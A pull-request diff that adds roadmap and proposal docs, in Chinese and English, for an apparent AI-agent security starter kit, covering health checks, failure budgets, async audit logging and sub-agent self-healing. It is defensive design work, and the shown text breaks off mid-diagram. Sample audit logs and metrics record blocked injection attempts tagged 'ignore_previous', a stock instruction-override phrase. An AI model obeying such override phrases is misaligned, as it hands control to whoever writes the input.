### PR TITLE
docs: add roadmap and 6 improvement proposals

### DIFF
--- a/docs/ROADMAP.md
+++ b/docs/ROADMAP.md
@@ -1,0 +1,127 @@
+# 🗺️ OpenClaw Security Starter — Roadmap
+
+# OpenClaw 安全啟動器 — 發展路線圖
+
+> 本文件概述 OpenClaw Security Starter 的改進計畫，涵蓋健康監控、安全沙箱、審計強化等六大方向。
+> This document outlines the improvement roadmap for OpenClaw Security Starter, covering six major initiatives including health monitoring, security sandbox, and audit enhancement.
+
+---
+
+## 路線圖總覽 / Roadmap Overview
+
+```mermaid
+%%{init: {'theme': 'dark'}}%%
+gantt
+    title OpenClaw Security Starter Roadmap
+    dateFormat YYYY-MM-DD
+    section P0 — 基礎建設 / Foundation
+        Health Check / Watchdog 機制           :p0a, 2026-04-01, 14d
+        測試套件與 CI/CD                        :p0b, 2026-04-01, 14d
+    section P1 — 核心安全 / Core Security
+        系統指令安全沙箱                        :p1a, after p0a, 14d
+        失控保護機制                            :p1b, after p0a, 14d
+    section P2 — 進階功能 / Advanced
+        NemoClaw 相容審計層                     :p2a, after p1a, 21d
+        Sub-Agent 監控架構                      :p2b, after p1b, 21d
+```
+
+## 架構演進 / Architecture Evolution
+
+```mermaid
+%%{init: {'theme': 'dark'}}%%
+graph TB
+    subgraph "v1.0 — 現在 / Current"
+        S1["SHIELD<br/>存取控制"]
+        S2["AGENT_RULES<br/>行為規則"]
+        S3["INJECTION_GUARD<br/>注入防護"]
+        S4["TOOL_POLICY<br/>工具權限"]
+    end
+
+    subgraph "v1.5 — 計畫中 / Planned"
+        H["Health Check<br/>健康檢查"]
+        T["Test Suite<br/>測試套件"]
+        SB["Command Sandbox<br/>指令沙箱"]
+        FB["Failure Budget<br/>失控保護"]
+    end
+
+    subgraph "v2.0 — 願景 / Vision"
+        A["Audit Layer<br/>審計層"]
+        SA["Sub-Agent Monitor<br/>子代理監控 🦞"]
+    end
+
+    S1 --> H
+    S4 --> SB
+    S3 --> FB
+    H --> SA
+    SB --> A
+    T --> FB
+
+    style S1 fill:#1a5276,stroke:#3498db,color:#ecf0f1
+    style S2 fill:#1a5276,stroke:#3498db,color:#ecf0f1
+    style S3 fill:#1a5276,stroke:#3498db,color:#ecf0f1
+    style S4 fill:#1a5276,stroke:#3498db,color:#ecf0f1
+    style H fill:#1e8449,stroke:#2ecc71,color:#ecf0f1
+    style T fill:#1e8449,stroke:#2ecc71,color:#ecf0f1
+    style SB fill:#1e8449,stroke:#2ecc71,color:#ecf0f1
+    style FB fill:#1e8449,stroke:#2ecc71,color:#ecf0f1
+    style A fill:#7d3c98,stroke:#9b59b6,color:#ecf0f1
+    style SA fill:#7d3c98,stroke:#9b59b6,color:#ecf0f1
+```
+
+## 優先級矩陣 / Priority Matrix
+
+| 優先級 | 提案 / Proposal | 理由 / Rationale |
+|--------|----------------|-----------------|
+| **P0** | [Health Check / Watchdog 機制](proposals/health-check-watchdog.md) | 最基本的運維需求 / Essential for production ops |
+| **P0** | [測試套件與 CI/CD](proposals/test-suite-ci-cd.md) | 後續開發的基礎 / Foundation for future development |
+| **P1** | [系統指令安全沙箱](proposals/system-command-sandbox.md) | 直接提升安全性 / Direct security improvement |
+| **P1** | [失控保護機制](proposals/failure-budget-rate-cap.md) | 核心安全機制 / Core safety mechanism |
+| **P2** | [NemoClaw 相容審計層](proposals/nemoclaw-audit-layer.md) | 對接生態系 / Ecosystem integration |
+| **P2** | [Sub-Agent 監控架構](proposals/sub-agent-monitoring.md) | v2.0 目標 / v2.0 target |
+
+## 背景 / Background
+
+此路線圖源自社群討論，主要參與者包括：
+- 舊金山後端工程師提出的 K8s 自癒架構概念
+- 對 NVIDIA NemoClaw 審計層效能影響的討論
+- 工程師回饋指出 agent 可以內建執行系統指令（`df`, `ps`, `du` 等）進行自我監控
+
+This roadmap originates from community discussions, key inputs include:
+- K8s-inspired self-healing architecture from a San Francisco backend engineer
+- Discussions about NVIDIA NemoClaw's audit layer performance impact
+- Engineer feedback on agents running system commands (`df`, `ps`, `du`, etc.) for self-monitoring
+
+## 設計原則 / Design Principles
+
+1. **安全第一 / Security First** — 所有新功能都必須通過現有的 4 層安全驗證
+2. **效能意識 / Performance Aware** — 特別是審計層，不應顯著影響回應時間
+3. **可配置 / Configurable** — 所有功能都可透過 `security.config.json` 開關
+4. **向後相容 / Backward Compatible** — 不破壞現有的安全策略
+5. **可觀測 / Observable** — 所有行為都有日誌追蹤
+
+## 貢獻指南 / Contributing
+
+每個提案都有獨立的文件，包含詳細的問題描述、架構設計和驗收標準。歡迎針對任何提案提交 PR！
+
+Each proposal has a dedicated document with detailed problem description, architecture design, and acceptance criteria. PRs are welcome for any proposal!
+
+### 如何開始 / Getting Started
+
+1. 選擇一個感興趣的提案 / Pick a proposal that interests you
+2. 閱讀對應的提案文件 / Read the proposal document
+3. 在對應的 GitHub Issue 上留言 / Comment on the related GitHub Issue
+4. Fork → Branch → PR
+
+## 相關 Issues / Related Issues
+
+- [#3 — feat: Health Check / Watchdog 機制](https://github.com/grabee-chen/openclaw-security-starter/issues/3)
+- [#4 — feat: Sub-Agent 監控架構 — 龍蝦自癒模式](https://github.com/grabee-chen/openclaw-security-starter/issues/4)
+- [#5 — feat: 系統指令安全沙箱](https://github.com/grabee-chen/openclaw-security-starter/issues/5)
+- [#6 — feat: 失控保護機制](https://github.com/grabee-chen/openclaw-security-starter/issues/6)
+- [#7 — feat: NemoClaw 相容審計層](https://github.com/grabee-chen/openclaw-security-starter/issues/7)
+- [#8 — chore: 加入測試套件與 CI/CD](https://github.com/grabee-chen/openclaw-security-starter/issues/8)
+
+---
+
+> 🦞 *「龍蝦會斷肢再生，系統也能自我修復」*
+> *"Lobsters regenerate lost limbs; systems can self-heal too"*

--- a/docs/proposals/failure-budget-rate-cap.md
+++ b/docs/proposals/failure-budget-rate-cap.md
@@ -1,0 +1,195 @@
+# 失控保護機制
+
+# Failure Budget & Rate Cap
+
+> **Priority / 優先級**: P1
+> **Status / 狀態**: Proposed / 提案中
+> **Target Version / 目標版本**: v1.5
+
+---
+
+## 問題描述 / Problem Statement
+
+目前 repo 有基本的速率限制（10 req/min/user, injection threshold: 3），但缺乏更深層的失控保護。當系統進入異常狀態時（例如連鎖故障、依賴服務崩潰），目前的機制無法有效阻止系統繼續消耗資源或產生無效重試。
+
+The repo has basic rate limiting (10 req/min/user, injection threshold: 3) but lacks deeper runaway protection. When the system enters an abnormal state (e.g., cascading failures, dependency crashes), current mechanisms cannot effectively prevent resource consumption or futile retries.
+
+### 社群建議 / Community Input
+
+> *"strict caps (max replicas, cooldown, backoff jitter), failure budgets + root-cause isolation, immutable config + audit logs so recovery is observable and rollbackable"*
+
+---
+
+## 系統降級狀態機 / Degradation State Machine
+
+```mermaid
+%%{init: {'theme': 'dark'}}%%
+stateDiagram-v2
+    [*] --> Normal: System healthy
+
+    Normal --> Warning: Error rate > 5%
+    Warning --> Normal: Rate drops below 3%
+
+    Warning --> Degraded: Budget 50% consumed
+    Degraded --> Warning: Partial recovery
+
+    Degraded --> Critical: Budget 90% consumed
+    Critical --> Lockdown: Budget exhausted
+
+    Lockdown --> Recovery: Root cause identified
+    Recovery --> Normal: Fix verified
+    Lockdown --> Manual: Auto-recovery failed
+    Manual --> Normal: OWNER intervention
+
+    note right of Normal: 🟢 全速運作 / Full speed
+    note right of Warning: 🟡 加入退避 / Add backoff
+    note right of Degraded: 🟠 降級模式 / Reduced capacity
+    note right of Critical: 🔴 最小功能 / Minimal function
+    note right of Lockdown: ⛔ 完全鎖定 / Full lock
+```
+
+## 核心機制 / Core Mechanisms
+
+### 1. 故障預算 / Failure Budget
+
+```mermaid
+%%{init: {'theme': 'dark'}}%%
+graph TB
+    subgraph "故障預算計算 / Budget Calculation"
+        EC["Error Counter<br/>錯誤計數器"] --> BW{"Budget Window<br/>預算週期 (1hr)"}
+        BW -->|"< 25 errors"| N["🟢 Normal"]
+        BW -->|"25-44"| W["🟡 Warning"]
+        BW -->|"45-49"| D["🟠 Degraded"]
+        BW -->|"= 50"| L["⛔ Lockdown"]
+    end
+
+    subgraph "預算重設 / Budget Reset"
+        T["⏰ Sliding Window<br/>滑動窗口"] -->|"errors age out"| EC
+        R["🔄 Manual Reset<br/>手動重設 (OWNER)"] -->|"clear"| EC
+    end
+
+    style N fill:#1e8449,stroke:#2ecc71,color:#ecf0f1
+    style W fill:#d4ac0d,stroke:#f1c40f,color:#1a1a2e
+    style D fill:#e67e22,stroke:#f39c12,color:#ecf0f1
+    style L fill:#922b21,stroke:#e74c3c,color:#ecf0f1
+```
+
+### 2. 根因隔離 / Root-Cause Isolation
+
+```mermaid
+%%{init: {'theme': 'dark'}}%%
+graph TD
+    E["🚨 Error Detected"] --> A{"Error Analysis<br/>錯誤分析"}
+    A -->|"timeout, 429"| T["⏳ Transient<br/>暫時性"]
+    A -->|"config error, missing dep"| P["🔧 Persistent<br/>持續性"]
+    A -->|"new version, changed API"| D["🚀 Deployment<br/>部署相關"]
+
+    T -->|"action"| T1["Retry with backoff<br/>退避重試"]
+    P -->|"action"| P1["Stop retry + alert OWNER<br/>停止重試 + 通知"]
+    D -->|"action"| D1["Rollback to last known good<br/>回滾到已知良好版本"]
+
+    style T fill:#1e8449,stroke:#2ecc71,color:#ecf0f1
+    style P fill:#d4ac0d,stroke:#f1c40f,color:#1a1a2e
+    style D fill:#922b21,stroke:#e74c3c,color:#ecf0f1
+```
+
+| 類型 / Type | 特徵 / Characteristics | 回應 / Response |
+|------------|----------------------|----------------|
+| Transient 暫時性 | 超時、限流 (429)、網路抖動 | 退避重試，限制 3 次 |
+| Persistent 持續性 | 配置錯誤、依賴缺失、權限問題 | 停止重試，通知 OWNER |
+| Deployment 部署相關 | 新版本 bug、API 變更 | 回滾到已知良好版本 |
+
+### 3. 退避抖動 / Backoff with Jitter
+
+```
+delay = min(base_ms * 2^attempt, max_ms) + random(0, jitter_ms)
+```
+
+範例 / Example (base=1000, max=60000, jitter=500):
+
+| Attempt | Base Delay | With Jitter |
+|---------|-----------|-------------|
+| 1 | 2,000ms | 2,000-2,500ms |
+| 2 | 4,000ms | 4,000-4,500ms |
+| 3 | 8,000ms | 8,000-8,500ms |
+| 4 | 16,000ms | 16,000-16,500ms |
+| 5 | 32,000ms | 32,000-32,500ms |
+| 6+ | 60,000ms | 60,000-60,500ms |
+
+### 4. 不可變配置 / Immutable Config
+
+- 所有配置變更記錄在審計日誌
+- 每次修復動作前快照當前配置
+- 支援回滾到任意歷史配置
+- OWNER 才能修改配置
+
+## 各層級行為 / Behavior by Level
+
+| 層級 / Level | 觸發 / Trigger | 請求處理 / Request Handling | 額外動作 / Extra Actions |
+|-------------|---------------|---------------------------|------------------------|
+| 🟢 Normal | Error < 5% | 正常處理 | 無 |
+| 🟡 Warning | Error 5-15% | 加入退避延遲 | 記錄 warning 日誌 |
+| 🟠 Degraded | Budget 50% | 降低吞吐量 50% | 通知 OWNER |
+| 🔴 Critical | Budget 90% | 僅處理 OWNER 請求 | 每分鐘告警 |
+| ⛔ Lockdown | Budget 100% | 拒絕所有請求 | 持續告警直到介入 |
+
+## 配置 / Configuration
+
+```json
+{
+  "failure_protection": {
+    "enabled": true,
+    "budget": {
+      "window_seconds": 3600,
+      "max_errors": 50,
+      "sliding_window": true
+    },
+    "thresholds": {
+      "warning_percent": 5,
+      "degraded_percent": 50,
+      "critical_percent": 90,
+      "lockdown_percent": 100
+    },
+    "backoff": {
+      "base_ms": 1000,
+      "max_ms": 60000,
+      "jitter_ms": 500,
+      "max_retries": 5
+    },
+    "root_cause": {
+      "transient_retry_limit": 3,
+      "persistent_alert_after": 5,
+      "deployment_rollback_enabled": false
+    },
+    "lockdown": {
+      "allow_owner_requests": true,
+      "alert_interval_seconds": 60,
+      "auto_recovery_enabled": false
+    }
+  }
+}
+```
+
+## 實作步驟 / Implementation Steps
+
+1. 實作錯誤計數器與滑動窗口
+2. 實作 5 層降級狀態機
+3. 實作退避抖動演算法
+4. 實作根因分類器
+5. 整合 `security.config.json`
+6. 整合審計日誌
+7. 更新文件
+
+## 驗收標準 / Acceptance Criteria
+
+- [ ] 滑動窗口故障預算系統
+- [ ] 5 層降級狀態（Normal → Lockdown）
+- [ ] 根因分類器（Transient / Persistent / Deployment）
+- [ ] 指數退避 + 抖動
+- [ ] Lockdown 時通知 OWNER
+- [ ] 配置變更審計追蹤
+- [ ] `security.config.json` 可配置
+
+---
+
+> 📄 Related Issue: `feat: 失控保護機制 (Failure Budget & Rate Cap)`

--- a/docs/proposals/health-check-watchdog.md
+++ b/docs/proposals/health-check-watchdog.md
@@ -1,0 +1,163 @@
+# Health Check / Watchdog 機制
+
+# 健康檢查與看門狗機制
+
+> **Priority / 優先級**: P0
+> **Status / 狀態**: Proposed / 提案中
+> **Target Version / 目標版本**: v1.5
+
+---
+
+## 問題描述 / Problem Statement
+
+目前 OpenClaw Security Starter 缺乏任何健康監控機制。在生產環境中，代理可能因記憶體洩漏、CPU 過載、或依賴服務故障而靜默停止運作，但 Docker orchestrator 無法偵測到這些狀況並自動重啟容器。
+
+OpenClaw Security Starter currently lacks any health monitoring mechanism. In production, agents may silently stop functioning due to memory leaks, CPU overload, or dependency failures, but Docker orchestrators cannot detect these conditions and auto-restart containers.
+
+### 影響 / Impact
+
+- 代理靜默故障，使用者無法得到回應 / Silent agent failure, users get no response
+- 無法主動發現問題，只能被動等待使用者回報 / No proactive detection, only reactive user reports
+- Docker/K8s 無法執行自動重啟策略 / Docker/K8s cannot execute auto-restart policies
+
+---
+
+## 提案架構 / Proposed Architecture
+
+```mermaid
+%%{init: {'theme': 'dark'}}%%
+graph TD
+    subgraph "🤖 Agent Container"
+        A["Agent Process<br/>代理程序"] -->|"collect"| MC["Metrics Collector<br/>指標收集器"]
+        MC --> HE["Health Endpoint<br/>/health"]
+        MC --> ME["Metrics Endpoint<br/>/metrics"]
+        A -->|"heartbeat"| HB["Heartbeat Timer<br/>心跳計時器"]
+        HB --> HE
+    end
+
+    subgraph "🐳 Docker / K8s"
+        DC["HEALTHCHECK<br/>健康檢查"] -->|"GET /health"| HE
+        DC -->|"unhealthy 3x"| RS["Restart Policy<br/>重啟策略"]
+    end
+
+    subgraph "📊 Observability Stack"
+        PR["Prometheus"] -->|"scrape /metrics"| ME
+        PR --> GR["Grafana"]
+        GR --> AL["Alert Manager"]
+    end
+
+    style A fill:#1a5276,stroke:#3498db,color:#ecf0f1
+    style HE fill:#1e8449,stroke:#2ecc71,color:#ecf0f1
+    style ME fill:#1e8449,stroke:#2ecc71,color:#ecf0f1
+    style DC fill:#7d3c98,stroke:#9b59b6,color:#ecf0f1
+    style RS fill:#922b21,stroke:#e74c3c,color:#ecf0f1
+    style PR fill:#d4ac0d,stroke:#f1c40f,color:#1a1a2e
+    style GR fill:#d4ac0d,stroke:#f1c40f,color:#1a1a2e
+```
+
+## 健康指標 / Health Indicators
+
+| 指標 / Metric | 類型 / Type | 說明 / Description | 閾值 / Threshold |
+|--------------|------------|-------------------|-----------------|
+| `memory_rss_bytes` | Gauge | RSS 記憶體 / RSS memory | < 512MB |
+| `cpu_usage_percent` | Gauge | CPU 使用率 / CPU usage | < 80% |
+| `uptime_seconds` | Counter | 運行時間 / Uptime | > 0 |
+| `request_rate_per_min` | Gauge | 每分鐘請求數 / Requests/min | configurable |
+| `error_rate_percent` | Gauge | 錯誤率 / Error rate | < 5% |
+| `last_heartbeat_ms` | Gauge | 上次心跳 / Last heartbeat | < 60000 |
+| `security_layers_active` | Gauge | 活躍安全層數 / Active layers | = 4 |
+
+## /health 端點規格 / Endpoint Specification
+
+### Request
+```
+GET /health HTTP/1.1
+Host: localhost:18789
+```
+
+### Response (Healthy)
+```json
+{
+  "status": "healthy",
+  "timestamp": "2026-03-20T10:30:00Z",
+  "uptime_seconds": 3600,
+  "version": "1.0.0",
+  "checks": {
+    "memory": { "status": "pass", "value_mb": 128 },
+    "cpu": { "status": "pass", "value_percent": 15 },
+    "heartbeat": { "status": "pass", "last_ms": 500 },
+    "security_layers": {
+      "shield": "active",
+      "agent_rules": "active",
+      "injection_guard": "active",
+      "tool_policy": "active"
+    }
+  }
+}
+```
+
+### Response (Unhealthy)
+```json
+{
+  "status": "unhealthy",
+  "timestamp": "2026-03-20T10:30:00Z",
+  "checks": {
+    "memory": { "status": "fail", "value_mb": 490, "threshold_mb": 512 },
+    "heartbeat": { "status": "fail", "last_ms": 120000, "threshold_ms": 60000 }
+  }
+}
+```
+
+## Dockerfile HEALTHCHECK
+
+```dockerfile
+HEALTHCHECK --interval=30s --timeout=5s --start-period=10s --retries=3 \
+  CMD curl -f http://localhost:18789/health || exit 1
+```
+
+## 配置 / Configuration
+
+```json
+{
+  "health_check": {
+    "enabled": true,
+    "endpoint": "/health",
+    "port": 18789,
+    "interval_seconds": 30,
+    "thresholds": {
+      "memory_max_mb": 512,
+      "cpu_max_percent": 80,
+      "heartbeat_max_ms": 60000,
+      "error_rate_max_percent": 5
+    },
+    "metrics": {
+      "enabled": false,
+      "endpoint": "/metrics",
+      "format": "prometheus"
+    }
+  }
+}
+```
+
+## 實作步驟 / Implementation Steps
+
+1. **Dockerfile** — 加入 `HEALTHCHECK` 指令
+2. **Health endpoint** — 實作 `/health` HTTP 端點
+3. **Metrics collector** — 收集 memory, CPU, uptime 等指標
+4. **Heartbeat** — 定時更新心跳時間戳
+5. **Metrics endpoint** — （選用）Prometheus 格式 `/metrics`
+6. **Config** — 更新 `security.config.json` schema
+7. **Docs** — 更新 `architecture.md`
+
+## 驗收標準 / Acceptance Criteria
+
+- [ ] Dockerfile 包含 `HEALTHCHECK` 指令
+- [ ] `/health` 回傳結構化 JSON
+- [ ] 支援記憶體、CPU、心跳、安全層狀態檢查
+- [ ] 不健康狀態回傳 HTTP 503
+- [ ] 可在 `security.config.json` 配置閾值
+- [ ] 文件更新完成
+
+---
+
+> 📄 Related Issue: `feat: Health Check / Watchdog 機制`

--- a/docs/proposals/nemoclaw-audit-layer.md
+++ b/docs/proposals/nemoclaw-audit-layer.md
@@ -1,0 +1,214 @@
+# NemoClaw 相容審計層
+
+# NemoClaw-Compatible Audit Layer
+
+> **Priority / 優先級**: P2
+> **Status / 狀態**: Proposed / 提案中
+> **Target Version / 目標版本**: v2.0
+
+---
+
+## 問題描述 / Problem Statement
+
+NVIDIA NemoClaw 在 OpenClaw 之上增加了審計功能，但社群反映「效能會變差」。我們的目標是在 OpenClaw Security Starter 中實現同等或更好的審計能力，同時透過非同步設計最小化效能影響。
+
+NVIDIA NemoClaw adds audit capabilities on top of OpenClaw, but the community reports "performance degrades." Our goal is to achieve equivalent or better audit capability in OpenClaw Security Starter while minimizing performance impact through asynchronous design.
+
+### 現狀 / Current State
+
+目前 `security.config.json` 的 audit 區塊提供基本日誌：
+- `log_all_commands: true`
+- `log_rejections: true`
+- `log_injection_attempts: true`
+- `include_payload_in_logs: false`
+
+但缺乏結構化格式、指標導出、和與 NemoClaw 的互通性。
+
+---
+
+## 效能對比 / Performance Comparison
+
+```mermaid
+%%{init: {'theme': 'dark'}}%%
+graph LR
+    subgraph "❌ 同步審計 / Sync Audit (NemoClaw-style)"
+        N1["Request<br/>請求"] --> N2["Process<br/>處理"]
+        N2 --> N3["Sync Write Log<br/>同步寫入日誌"]
+        N3 --> N4["Response<br/>回應"]
+        N3 -.->|"⏱️ +50-200ms latency"| N4
+    end
+
+    subgraph "✅ 非同步審計 / Async Audit (Our approach)"
+        O1["Request<br/>請求"] --> O2["Process<br/>處理"]
+        O2 --> O3["Buffer Event<br/>緩衝事件"]
+        O3 --> O4["Response<br/>回應"]
+        O3 -.->|"⏱️ +0-2ms latency"| O4
+        O3 -->|"async"| O5["Batch Write<br/>批次寫入"]
+    end
+
+    style N3 fill:#922b21,stroke:#e74c3c,color:#ecf0f1
+    style O3 fill:#1e8449,stroke:#2ecc71,color:#ecf0f1
+    style O5 fill:#1e8449,stroke:#2ecc71,color:#ecf0f1
+```
+
+## 審計引擎架構 / Audit Engine Architecture
+
+```mermaid
+%%{init: {'theme': 'dark'}}%%
+graph TB
+    subgraph "📥 Event Sources / 事件來源"
+        E1["Command Exec<br/>指令執行"]
+        E2["Access Denied<br/>存取拒絕"]
+        E3["Injection Attempt<br/>注入嘗試"]
+        E4["Tool Policy Check<br/>工具策略"]
+        E5["Health Event<br/>健康事件"]
+        E6["Config Change<br/>配置變更"]
+    end
+
+    subgraph "⚙️ Audit Engine / 審計引擎"
+        RB["Ring Buffer<br/>環形緩衝區<br/>(1000 events)"]
+        FM["Formatter<br/>格式化器"]
+        AW["Async Writer<br/>非同步寫入器"]
+        SM["Sampling Manager<br/>採樣管理器"]
+    end
+
+    subgraph "📤 Output Targets / 輸出目標"
+        O1["📄 JSON Lines<br/>本地檔案"]
+        O2["📊 Prometheus<br/>/metrics"]
+        O3["🔗 OTLP<br/>OpenTelemetry"]
+        O4["🦎 NemoClaw<br/>相容格式"]
+    end
+
+    E1 & E2 & E3 & E4 & E5 & E6 --> SM
+    SM -->|"sampled events"| RB
+    RB --> FM
+    FM --> AW
+    AW --> O1 & O2 & O3 & O4
+
+    style RB fill:#d4ac0d,stroke:#f1c40f,color:#1a1a2e
+    style FM fill:#1a5276,stroke:#3498db,color:#ecf0f1
+    style AW fill:#1e8449,stroke:#2ecc71,color:#ecf0f1
+    style SM fill:#7d3c98,stroke:#9b59b6,color:#ecf0f1
+```
+
+## 日誌格式 / Log Formats
+
+### OpenClaw JSON Lines (主要格式 / Primary)
+
+```json
+{"ts":"2026-03-20T10:30:00.000Z","event":"command_exec","actor":"owner:182901234567890123","tool":"web_search","query_hash":"a1b2c3d4","result":"success","latency_ms":42,"shield_level":"T3","injection_scan":"pass","session_id":"sess_abc123"}
+{"ts":"2026-03-20T10:30:01.000Z","event":"access_denied","actor":"user:456789012345678901","reason":"untrusted_identity","shield_step":"identity_check","session_id":"sess_def456"}
+{"ts":"2026-03-20T10:30:02.000Z","event":"injection_attempt","actor":"user:789012345678901234","pattern":"ignore_previous","severity":"high","action":"blocked","alert_sent":true}
+```
+
+### NemoClaw 格式映射 / NemoClaw Format Mapping
+
+| OpenClaw Field | NemoClaw Field | Type | Notes |
+|---------------|---------------|------|-------|
+| `ts` | `timestamp` | string | ISO 8601 |
+| `event` | `event_type` | string | 1:1 mapping |
+| `actor` | `principal` | string | Format differs |
+| `tool` | `action` | string | Tool name |
+| `result` | `outcome` | string | success/failure |
+| `latency_ms` | `duration_ms` | number | Same semantics |
+| `shield_level` | `auth_level` | string | T0-T4 → NemoClaw levels |
+| `injection_scan` | `guardrail_result` | string | pass/fail/skip |
+
+### Prometheus Metrics
+
+```
+# HELP openclaw_commands_total Total commands executed
+# TYPE openclaw_commands_total counter
+openclaw_commands_total{tool="web_search",result="success"} 42
+
+# HELP openclaw_injection_attempts_total Total injection attempts
+# TYPE openclaw_injection_attempts_total counter
+openclaw_injection_attempts_total{pattern="ignore_previous"} 3
+
+# HELP openclaw_request_latency_ms Request latency histogram
+# TYPE openclaw_request_latency_ms histogram
+openclaw_request_latency_ms_bucket{le="10"} 5
+openclaw_request_latency_ms_bucket{le="50"} 35
+openclaw_request_latency_ms_bucket{le="100"} 40
+openclaw_request_latency_ms_bucket{le="+Inf"} 42
+```
+
+## 效能優化策略 / Performance Optimization
+
+| 策略 / Strategy | 說明 / Description | 效能影響 / Impact |
+|----------------|-------------------|-----------------|
+| Ring Buffer | 固定大小緩衝區，避免 OOM | O(1) memory |
+| Async Write | 非同步批次寫入 | +0-2ms latency |
+| Batch Flush | 每 100 筆或 5 秒寫入 | Amortized I/O |
+| Sampling | 高流量自動降採樣 | Configurable |
+| No Payload | 不記錄完整請求內容 | Privacy + speed |
+| Hash Only | 敏感資料只記錄 hash | Security |
+
+## 配置 / Configuration
+
+```json
+{
+  "audit": {
+    "log_all_commands": true,
+    "log_rejections": true,
+    "log_injection_attempts": true,
+    "include_payload_in_logs": false,
+    "format": "jsonl",
+    "output": {
+      "file": {
+        "enabled": true,
+        "path": "/var/log/openclaw/audit.jsonl",
+        "max_size_mb": 100,
+        "rotation": "daily",
+        "retention_days": 30
+      },
+      "prometheus": {
+        "enabled": false,
+        "endpoint": "/metrics"
+      },
+      "otlp": {
+        "enabled": false,
+        "endpoint": "http://localhost:4318",
+        "protocol": "http/protobuf"
+      },
+      "nemoclaw_compat": {
+        "enabled": false,
+        "format_version": "1.0"
+      }
+    },
+    "performance": {
+      "async_buffer": true,
+      "buffer_size": 1000,
+      "flush_interval_ms": 5000,
+      "flush_batch_size": 100,
+      "sampling_rate": 1.0,
+      "sampling_auto_adjust": true
+    }
+  }
+}
+```
+
+## 實作步驟 / Implementation Steps
+
+1. 定義結構化日誌 schema（JSON Lines）
+2. 實作 Ring Buffer + Async Writer
+3. 實作 Prometheus metrics 端點
+4. 實作 NemoClaw 格式轉換器
+5. （選用）實作 OTLP exporter
+6. 效能基準測試
+7. 更新 `security.config.json`
+8. 更新文件
+
+## 驗收標準 / Acceptance Criteria
+
+- [ ] JSON Lines 結構化日誌
+- [ ] 非同步寫入，延遲增加 < 5ms
+- [ ] Ring buffer 防止 OOM
+- [ ] Prometheus /metrics 端點
+- [ ] NemoClaw 格式映射文件
+- [ ] 日誌輪替 + 保留策略
+- [ ] 效能基準：審計開啟 vs 關閉延遲對比
+
+---
+
+> 📄 Related Issue: `feat: NemoClaw 相容審計層`

--- a/docs/proposals/sub-agent-monitoring.md
+++ b/docs/proposals/sub-agent-monitoring.md
@@ -1,0 +1,189 @@
+# Sub-Agent 監控架構 — 龍蝦自癒模式
+
+# Sub-Agent Monitoring — Lobster Self-Healing Architecture 🦞
+
+> **Priority / 優先級**: P2
+> **Status / 狀態**: Proposed / 提案中
+> **Target Version / 目標版本**: v2.0
+
+---
+
+## 問題描述 / Problem Statement
+
+在傳統的 agent 部署中，主代理的故障通常需要外部介入才能修復。受到龍蝦斷肢再生能力的啟發 🦞，我們提出使用 sub-agent 來實現自動監控與自癒的架構。
+
+In traditional agent deployments, main agent failures typically require external intervention to resolve. Inspired by the lobster's limb regeneration ability 🦞, we propose using sub-agents for automated monitoring and self-healing.
+
+### 社群背景 / Community Context
+
+此概念源自社群討論：
+- 舊金山後端工程師建議參考 K8s self-healing pod 模式
+- 提出外部看門狗、嚴格上限、quorum 檢查、故障預算等機制
+- 使用 sub-agent 做監控是一個在安全與自主性之間取得平衡的方向
+
+---
+
+## 三種可行架構 / Three Architecture Options
+
+```mermaid
+%%{init: {'theme': 'dark'}}%%
+graph TB
+    subgraph "方向 A：隔離執行 / Isolated Execution"
+        A1["Main Agent<br/>主代理"] -->|"delegate exec"| A2["Sandboxed Sub-Agent<br/>沙箱子代理"]
+        A2 -->|"execute"| A3["System Commands"]
+        A2 -.->|"prompt injection<br/>attack contained"| A4["🛡️ Blast Radius Limited"]
+    end
+
+    subgraph "方向 B：專職監控 / Dedicated Monitor"
+        B1["Main Agent<br/>主代理"] -.->|"observed by"| B2["Watchdog Sub-Agent<br/>監控子代理"]
+        B2 -->|"collect metrics"| B3["Health Data"]
+        B2 -->|"anomaly detected"| B4["Alert / Recovery"]
+    end
+
+    subgraph "方向 C：權限分級 / Permission Tiering"
+        C1["Read Commands<br/>df, ps, du"] -->|"low privilege"| C2["Direct Execution<br/>直接執行"]
+        C3["Write Commands<br/>rm, kill"] -->|"high privilege"| C4["Sub-Agent + Approval<br/>子代理 + 審批"]
+    end
+
+    style A4 fill:#1e8449,stroke:#2ecc71,color:#ecf0f1
+    style B4 fill:#d4ac0d,stroke:#f1c40f,color:#1a1a2e
+    style C2 fill:#1e8449,stroke:#2ecc71,color:#ecf0f1
+    style C4 fill:#922b21,stroke:#e74c3c,color:#ecf0f1
+```
+
+## 推薦架構：混合模式 / Recommended: Hybrid Approach
+
+結合三種方向的優點：
+
+```mermaid
+%%{init: {'theme': 'dark'}}%%
+graph TB
+    subgraph "🦞 龍蝦自癒系統 / Lobster Self-Healing System"
+        direction TB
+        WD["🔭 Watchdog Sub-Agent<br/>監控子代理"]
+        MA["🤖 Main Agent<br/>主代理"]
+        RM["🔄 Recovery Manager<br/>修復管理器"]
+        LE["🗳️ Leader Election<br/>領導者選舉"]
+    end
+
+    subgraph "📊 健康指標 / Health Signals"
+        H1["HTTP /health"]
+        H2["Heartbeat<br/>心跳"]
+        H3["Queue Depth<br/>佇列深度"]
+        H4["Memory / CPU"]
+        H5["Error Rate<br/>錯誤率"]
+        H6["Tool Timeout<br/>工具逾時"]
+    end
+
+    subgraph "🛡️ 安全護欄 / Safety Rails"
+        S1["Max Replicas: 3<br/>最大副本數"]
+        S2["Cooldown: 60s<br/>冷卻期"]
+        S3["Backoff Jitter<br/>退避抖動"]
+        S4["Failure Budget<br/>故障預算"]
+        S5["Immutable Config<br/>不可變配置"]
+        S6["Audit Trail<br/>審計追蹤"]
+    end
+
+    H1 & H2 & H3 & H4 & H5 & H6 --> WD
+    WD -->|"anomaly"| LE
+    LE -->|"leader confirmed"| RM
+    RM -->|"spawn / restart"| MA
+    S1 & S2 & S3 & S4 --> RM
+    RM --> S5 & S6
+
+    style WD fill:#d4ac0d,stroke:#f1c40f,color:#1a1a2e
+    style MA fill:#1a5276,stroke:#3498db,color:#ecf0f1
+    style RM fill:#1e8449,stroke:#2ecc71,color:#ecf0f1
+    style LE fill:#7d3c98,stroke:#9b59b6,color:#ecf0f1
+```
+
+## 自癒狀態機 / Self-Healing State Machine
+
+```mermaid
+%%{init: {'theme': 'dark'}}%%
+stateDiagram-v2
+    [*] --> Healthy: Agent starts
+    Healthy --> Degraded: Health check fails
+    Degraded --> Recovering: Within failure budget
+    Recovering --> Healthy: Recovery succeeds
+    Degraded --> Critical: Exceeds failure budget
+    Critical --> Spawning: Leader election won
